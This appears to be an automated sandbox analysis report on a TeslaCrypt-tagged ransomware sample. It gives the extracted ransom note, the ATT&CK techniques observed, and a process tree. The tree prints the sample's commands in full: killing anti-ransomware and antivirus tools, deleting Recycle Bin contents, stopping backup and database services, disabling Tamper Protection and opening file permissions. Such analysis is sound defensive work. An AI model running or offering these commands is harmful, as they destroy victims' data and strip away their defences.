teslacrypt | f42f289579c0ea0fb6e03342144718ac553d8f157155bd854084719291be84e8

Analysis

max time kernel
83s
max time network
112s
platform
windows10_x64
resource
win10v20201028
submitted
04/02/2021, 19:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bbc[1].exe

Score

10^/10

teslacrypt discovery evasion ransomware trojan

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt

Ransom Note

Don't worry, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. We also downloaded your corporate files (databases, tables, accounting information, etc.) and we will have to publish them if you do not agree to cooperation. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Key Identifier: G9YzkxdhROX9K7TkivUhV5mz8r5i0LTEWio5Rme01VfPgwYQN1Pj6ZgRxBdIDdRJqsvxsOffZRq2edhIblNm0QMZDYHevK/w/b2muhKlbfydG2nXhUCwuKplSjR1Z6H/SzVYLWe83tVKPo85CwP+xVXLbhu/qEnEOPH0AX5UL6Np2G0d/cRkkIwfu/iUXnUwCzno9l2EYe+05ph7I6j4TGK5WWKcVhqEC8aZfhaD4UGRssHa+xPlIuQRAgwT4Yic5UsIxb0iz+s+VI6tZH169IAJipzoPdmxBA/mJH4h3CW+4As0WMTh1YuexPqR9Gn82FLdsP9EiX6McI0wVAAswYJ65wNXWhBa/9eFNZJuaUbzFPritH+I7fd7G0EeK4Jyczs2BoNWVnFRiQnvAy99yhONrptL3t6HCNS1U4+gDyH7+zIeds1efdwELRKkdPJV3xAPv0vRco9CTKIVfmYQpb668Zr905VOiyxaIqgEJYCRkzf9NTKpwE1vsZ2yCbzVHMVae/NVdvDsMK7BT2uGqTl2GTSZVAizpkQJxbV0V/V/YwaBhvMIoR0BuD4987n8vhgeD+9Ducd5sAOtjVt5UyRnVv/nlbveSqXlhPEu8bMjOH+K9BZOQ5yZKEGIgivqFpf+zJyO4qtp64jI66AmECq2aa2bywZ5JfzGXBOm3gE=

Emails

[email protected]

Extracted

Path

C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt

Ransom Note

Emails

[email protected]

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
TeslaCrypt, AlphaCrypt
Ransomware based on CryptoLocker. Shut down by the developers in 2016.
ransomware teslacrypt

Executes dropped EXE 1 IoCs

pid	Process
2828	tm94ra6g.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\ConnectRename.raw => C:\Users\Admin\Pictures\ConnectRename.raw.fsvlf4	tm94ra6g.exe
File renamed	C:\Users\Admin\Pictures\DisableRequest.raw => C:\Users\Admin\Pictures\DisableRequest.raw.fsvlf4	tm94ra6g.exe
File renamed	C:\Users\Admin\Pictures\ExitSkip.raw => C:\Users\Admin\Pictures\ExitSkip.raw.fsvlf4	tm94ra6g.exe
File opened for modification	C:\Users\Admin\Pictures\SelectClose.tiff	tm94ra6g.exe
File renamed	C:\Users\Admin\Pictures\SelectClose.tiff => C:\Users\Admin\Pictures\SelectClose.tiff.fsvlf4	tm94ra6g.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	tm94ra6g.exe

Modifies file permissions 1 TTPs 3 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
7372	icacls.exe
7336	icacls.exe
7288	icacls.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	tm94ra6g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	tm94ra6g.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DISM\dism.log	powershell.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 1 IoCs

discovery

Remote System Discovery

T1018

pid	Process
16504	net.exe

Kills process with taskkill 48 IoCs

evasion

pid	Process
7152	taskkill.exe
6808	taskkill.exe
7324	taskkill.exe
7060	taskkill.exe
6920	taskkill.exe
6888	taskkill.exe
9188	taskkill.exe
9148	taskkill.exe
9280	taskkill.exe
9236	taskkill.exe
9108	taskkill.exe
9028	taskkill.exe
9124	taskkill.exe
9116	taskkill.exe
9172	taskkill.exe
9156	taskkill.exe
9132	taskkill.exe
9092	taskkill.exe
9084	taskkill.exe
9076	taskkill.exe
9256	taskkill.exe
5764	taskkill.exe
9012	taskkill.exe
5852	taskkill.exe
9180	taskkill.exe
9068	taskkill.exe
9220	taskkill.exe
7404	taskkill.exe
7028	taskkill.exe
9036	taskkill.exe
7448	taskkill.exe
7364	taskkill.exe
9196	taskkill.exe
2032	taskkill.exe
9244	taskkill.exe
6996	taskkill.exe
6964	taskkill.exe
6840	taskkill.exe
9164	taskkill.exe
9264	taskkill.exe
9228	taskkill.exe
7276	taskkill.exe
7124	taskkill.exe
9204	taskkill.exe
9052	taskkill.exe
9044	taskkill.exe
6956	taskkill.exe
9272	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1096	reg.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
13156	notepad.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4852	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe
2828	tm94ra6g.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	2828	tm94ra6g.exe
Token: SeDebugPrivilege	3592	powershell.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeDebugPrivilege	9012	taskkill.exe
Token: SeDebugPrivilege	5764	taskkill.exe
Token: SeDebugPrivilege	9108	taskkill.exe
Token: SeDebugPrivilege	9124	taskkill.exe
Token: SeDebugPrivilege	9236	taskkill.exe
Token: SeDebugPrivilege	6808	taskkill.exe
Token: SeDebugPrivilege	9084	taskkill.exe
Token: SeDebugPrivilege	5852	taskkill.exe
Token: SeDebugPrivilege	6920	taskkill.exe
Token: SeDebugPrivilege	9036	taskkill.exe
Token: SeDebugPrivilege	7404	taskkill.exe
Token: SeDebugPrivilege	9228	taskkill.exe
Token: SeDebugPrivilege	6956	taskkill.exe
Token: SeDebugPrivilege	7060	taskkill.exe
Token: SeDebugPrivilege	7364	taskkill.exe
Token: SeDebugPrivilege	7276	taskkill.exe
Token: SeDebugPrivilege	9172	taskkill.exe
Token: SeDebugPrivilege	9164	taskkill.exe
Token: SeDebugPrivilege	9188	taskkill.exe
Token: SeDebugPrivilege	9052	taskkill.exe
Token: SeDebugPrivilege	9180	taskkill.exe
Token: SeDebugPrivilege	7152	taskkill.exe
Token: SeDebugPrivilege	9196	taskkill.exe
Token: SeDebugPrivilege	9076	taskkill.exe
Token: SeDebugPrivilege	9044	taskkill.exe
Token: SeDebugPrivilege	9244	taskkill.exe
Token: SeDebugPrivilege	9132	taskkill.exe
Token: SeDebugPrivilege	9068	taskkill.exe
Token: SeDebugPrivilege	7028	taskkill.exe
Token: SeDebugPrivilege	9280	taskkill.exe
Token: SeDebugPrivilege	9028	taskkill.exe
Token: SeDebugPrivilege	7448	taskkill.exe
Token: SeDebugPrivilege	9116	taskkill.exe
Token: SeDebugPrivilege	6888	taskkill.exe
Token: SeDebugPrivilege	9156	taskkill.exe
Token: SeDebugPrivilege	9264	taskkill.exe
Token: SeDebugPrivilege	9272	taskkill.exe
Token: SeDebugPrivilege	6964	taskkill.exe
Token: SeDebugPrivilege	7324	taskkill.exe
Token: SeDebugPrivilege	7124	taskkill.exe
Token: SeDebugPrivilege	9092	taskkill.exe
Token: SeDebugPrivilege	6840	taskkill.exe
Token: SeDebugPrivilege	9256	taskkill.exe
Token: SeDebugPrivilege	9148	taskkill.exe
Token: SeDebugPrivilege	9220	taskkill.exe
Token: SeDebugPrivilege	6996	taskkill.exe
Token: SeDebugPrivilege	8932	powershell.exe
Token: SeDebugPrivilege	7068	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2828	tm94ra6g.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2828	tm94ra6g.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4048 wrote to memory of 2828	4048	bbc[1].exe	75
PID 4048 wrote to memory of 2828	4048	bbc[1].exe	75
PID 4048 wrote to memory of 2828	4048	bbc[1].exe	75
PID 2828 wrote to memory of 3592	2828	tm94ra6g.exe	76
PID 2828 wrote to memory of 3592	2828	tm94ra6g.exe	76
PID 2828 wrote to memory of 3592	2828	tm94ra6g.exe	76
PID 2828 wrote to memory of 2032	2828	tm94ra6g.exe	80
PID 2828 wrote to memory of 2032	2828	tm94ra6g.exe	80
PID 2828 wrote to memory of 2032	2828	tm94ra6g.exe	80
PID 2828 wrote to memory of 2100	2828	tm94ra6g.exe	82
PID 2828 wrote to memory of 2100	2828	tm94ra6g.exe	82
PID 2828 wrote to memory of 2100	2828	tm94ra6g.exe	82
PID 2828 wrote to memory of 1096	2828	tm94ra6g.exe	83
PID 2828 wrote to memory of 1096	2828	tm94ra6g.exe	83
PID 2828 wrote to memory of 1096	2828	tm94ra6g.exe	83
PID 2828 wrote to memory of 908	2828	tm94ra6g.exe	86
PID 2828 wrote to memory of 908	2828	tm94ra6g.exe	86
PID 2828 wrote to memory of 908	2828	tm94ra6g.exe	86
PID 2828 wrote to memory of 3096	2828	tm94ra6g.exe	88
PID 2828 wrote to memory of 3096	2828	tm94ra6g.exe	88
PID 2828 wrote to memory of 3096	2828	tm94ra6g.exe	88
PID 2828 wrote to memory of 1892	2828	tm94ra6g.exe	89
PID 2828 wrote to memory of 1892	2828	tm94ra6g.exe	89
PID 2828 wrote to memory of 1892	2828	tm94ra6g.exe	89
PID 2828 wrote to memory of 3964	2828	tm94ra6g.exe	92
PID 2828 wrote to memory of 3964	2828	tm94ra6g.exe	92
PID 2828 wrote to memory of 3964	2828	tm94ra6g.exe	92
PID 2828 wrote to memory of 3848	2828	tm94ra6g.exe	93
PID 2828 wrote to memory of 3848	2828	tm94ra6g.exe	93
PID 2828 wrote to memory of 3848	2828	tm94ra6g.exe	93
PID 2828 wrote to memory of 3928	2828	tm94ra6g.exe	111
PID 2828 wrote to memory of 3928	2828	tm94ra6g.exe	111
PID 2828 wrote to memory of 3928	2828	tm94ra6g.exe	111
PID 2828 wrote to memory of 1508	2828	tm94ra6g.exe	95
PID 2828 wrote to memory of 1508	2828	tm94ra6g.exe	95
PID 2828 wrote to memory of 1508	2828	tm94ra6g.exe	95
PID 2828 wrote to memory of 2640	2828	tm94ra6g.exe	96
PID 2828 wrote to memory of 2640	2828	tm94ra6g.exe	96
PID 2828 wrote to memory of 2640	2828	tm94ra6g.exe	96
PID 2828 wrote to memory of 4064	2828	tm94ra6g.exe	108
PID 2828 wrote to memory of 4064	2828	tm94ra6g.exe	108
PID 2828 wrote to memory of 4064	2828	tm94ra6g.exe	108
PID 2828 wrote to memory of 3192	2828	tm94ra6g.exe	98
PID 2828 wrote to memory of 3192	2828	tm94ra6g.exe	98
PID 2828 wrote to memory of 3192	2828	tm94ra6g.exe	98
PID 2828 wrote to memory of 3960	2828	tm94ra6g.exe	105
PID 2828 wrote to memory of 3960	2828	tm94ra6g.exe	105
PID 2828 wrote to memory of 3960	2828	tm94ra6g.exe	105
PID 2828 wrote to memory of 1544	2828	tm94ra6g.exe	100
PID 2828 wrote to memory of 1544	2828	tm94ra6g.exe	100
PID 2828 wrote to memory of 1544	2828	tm94ra6g.exe	100
PID 2828 wrote to memory of 3824	2828	tm94ra6g.exe	103
PID 2828 wrote to memory of 3824	2828	tm94ra6g.exe	103
PID 2828 wrote to memory of 3824	2828	tm94ra6g.exe	103
PID 2828 wrote to memory of 2260	2828	tm94ra6g.exe	102
PID 2828 wrote to memory of 2260	2828	tm94ra6g.exe	102
PID 2828 wrote to memory of 2260	2828	tm94ra6g.exe	102
PID 2828 wrote to memory of 2576	2828	tm94ra6g.exe	112
PID 2828 wrote to memory of 2576	2828	tm94ra6g.exe	112
PID 2828 wrote to memory of 2576	2828	tm94ra6g.exe	112
PID 2828 wrote to memory of 3616	2828	tm94ra6g.exe	113
PID 2828 wrote to memory of 3616	2828	tm94ra6g.exe	113
PID 2828 wrote to memory of 3616	2828	tm94ra6g.exe	113
PID 2828 wrote to memory of 1732	2828	tm94ra6g.exe	114

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	tm94ra6g.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	tm94ra6g.exe

C:\Users\Admin\AppData\Local\Temp\bbc[1].exe
"C:\Users\Admin\AppData\Local\Temp\bbc[1].exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4048
- C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
  "C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe"
  2⤵
  - Executes dropped EXE
  - Modifies extensions of user files
  - Drops startup file
  - Windows security modification
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2828
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3592
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill" /F /IM RaccineSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2032
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\reg.exe
    "reg" delete HKCU\Software\Raccine /F
    3⤵
    - Modifies registry key
    PID:1096
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /DELETE /TN "Raccine Rules Updater" /F
    3⤵
    PID:908
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config Dnscache start= auto
    3⤵
    PID:3096
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    PID:1892
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
    3⤵
    PID:3964
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config FDResPub start= auto
    3⤵
    PID:3848
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SSDPSRV start= auto
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config upnphost start= auto
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:3192
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /c rd /s /q D:\\$Recycle.bin
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\net.exe
    "net.exe" start FDResPub /y
    3⤵
    PID:2260
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start FDResPub /y
      4⤵
      PID:4128
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:3824
- - C:\Windows\SysWOW64\net.exe
    "net.exe" start Dnscache /y
    3⤵
    PID:3960
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start Dnscache /y
      4⤵
      PID:2456
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:4064
- - C:\Windows\SysWOW64\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop avpsus /y
    3⤵
    PID:2576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:4220
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    PID:3616
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:4204
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mfewc /y
    3⤵
    PID:1732
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:4296
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop bedbg /y
    3⤵
    PID:3516
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop bedbg /y
      4⤵
      PID:4348
- - C:\Windows\SysWOW64\net.exe
    "net.exe" start SSDPSRV /y
    3⤵
    PID:1644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start SSDPSRV /y
      4⤵
      PID:4452
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    PID:3692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:4464
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:1388
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:4660
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:1808
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:4532
- - C:\Windows\SysWOW64\net.exe
    "net.exe" start upnphost /y
    3⤵
    PID:2408
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start upnphost /y
      4⤵
      PID:4476
- - C:\Windows\SysWOW64\netsh.exe
    "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SQL_2008 /y
    3⤵
    PID:4396
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:4904
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:4520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop DefWatch /y
      4⤵
      PID:4996
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:4776
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:8188
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:4680
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:4136
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:4616
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:5112
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:4568
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop VSNAPVSS /y
      4⤵
      PID:5084
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:4424
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:5004
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:4860
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBIDPService /y
      4⤵
      PID:6932
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MMS /y
    3⤵
    PID:4948
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:11120
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:5024
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
      4⤵
      PID:12040
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:4824
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:13632
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:7456
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
      4⤵
      PID:14540
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:7464
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService /y
      4⤵
      PID:14572
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:7472
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:14548
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:7480
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:14564
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:7488
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:14532
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:7496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop stc_raw_agent /y
      4⤵
      PID:14556
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:7504
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:14516
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:7512
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:14524
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:7520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:14508
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:7528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:14500
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop DCAgent /y
    3⤵
    PID:6772
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:14864
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SHAREPOINT /y
    3⤵
    PID:6764
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:14612
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:6756
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:14596
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AVP /y
    3⤵
    PID:6740
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:14604
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /y
    3⤵
    PID:6732
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:14620
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /
    3⤵
    PID:6724
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
      4⤵
      PID:14628
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:6716
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:14644
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop Antivirus /y
    3⤵
    PID:6708
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:14636
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:6700
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:14684
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:6692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:14700
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:6676
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:14204
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$PROD /y
    3⤵
    PID:6668
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:14668
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:6660
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:14140
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop “Sophos Web Control Service” /y
    3⤵
    PID:6652
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
      4⤵
      PID:14212
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:6644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:14132
- - C:\Windows\SysWOW64\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:6956
- - C:\Windows\SysWOW64\icacls.exe
    "icacls" "Z:*" /grant Everyone:F /T /C /Q
    3⤵
    - Modifies file permissions
    PID:7372
- - C:\Windows\SysWOW64\icacls.exe
